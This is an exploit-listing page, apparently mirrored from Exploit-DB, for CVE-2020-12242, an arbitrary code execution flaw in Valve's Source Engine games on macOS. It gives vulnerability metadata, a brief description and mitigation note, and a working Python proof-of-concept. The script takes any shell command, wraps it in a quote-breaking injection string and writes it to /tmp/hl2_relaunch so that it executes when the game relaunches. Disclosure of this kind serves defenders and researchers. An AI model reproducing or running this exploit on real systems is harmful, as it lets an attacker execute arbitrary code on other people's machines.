Source Engine CS:GO BuildID: 4937372 - Arbitrary Code Execution

vendor:

Source Engine

by:

0xEmma/BugByte/SebastianPC

7.8

CVSS

HIGH

Arbitrary Code Execution

CWE

Product Name: Source Engine

Affected Version From: Source Engine, Tested on CS:GO BuildID: 4937372 TF2 BuildID: 4871679 Garry's Mod BuildID: 4803834 Half Life 2 BuildID: 4233302

Affected Version To: Source Engine, Tested on CS:GO BuildID: 4937372 TF2 BuildID: 4871679 Garry's Mod BuildID: 4803834 Half Life 2 BuildID: 4233302

Patch Exists: YES

Related CWE: CVE-2020-12242

CPE: a:valvesoftware:source_engine

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: MacOS 15.3

2020

Source Engine CS:GO BuildID: 4937372 – Arbitrary Code Execution

This exploit allows an attacker to execute arbitrary code on a vulnerable system. The exploit works by writing a malicious payload to a file called hl2_relaunch in the /tmp directory. The payload is then executed when the vulnerable application is launched.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update their systems to the latest version of the software.

Source

Exploit-DB raw data:

# Exploit Title: Source Engine CS:GO BuildID: 4937372 - Arbitrary Code Execution
# Date: 2020-04-27
# Exploit Author: 0xEmma/BugByte/SebastianPC
# Vendor Homepage: https://www.valvesoftware.com/en/
# Version: Source Engine, Tested on CS:GO BuildID: 4937372 TF2 BuildID: 4871679 Garry's Mod BuildID: 4803834 Half Life 2 BuildID: 4233302
# Tested on: MacOS 15.3
# CVE : CVE-2020-12242

import os, random, sys
banner = """
:'######:::'#######::'##::::'##::'######:::'#######::'##:::'##::::'##:::'########:
'##... ##:'##.... ##: ##:::: ##:'##... ##:'##.... ##: ##::'##:::'####:::... ##..::
 ##:::..:: ##'### ##: ##:::: ##: ##:::..::..::::: ##: ##:'##::::.. ##:::::: ##::::
. ######:: ## ### ##: ##:::: ##: ##::::::::'#######:: #####::::::: ##:::::: ##::::
:..... ##: ## #####:: ##:::: ##: ##::::::::...... ##: ##. ##:::::: ##:::::: ##::::
'##::: ##: ##.....::: ##:::: ##: ##::: ##:'##:::: ##: ##:. ##::::: ##:::::: ##::::
. ######::. #######::. #######::. ######::. #######:: ##::. ##::'######:::: ##::::
:......::::.......::::.......::::......::::.......:::..::::..:::......:::::..:::::
"""
print(banner)


if os.name == "posix":
    command = str(input("Code to run? "))
    payload = '"; ' + command + '; echo "'
    f = open("/tmp/hl2_relaunch", "w")

    f.write(payload)
    f.close()

if os.name == "nt":
    print("Windows based OS's not supported, see CVE-2020-12242")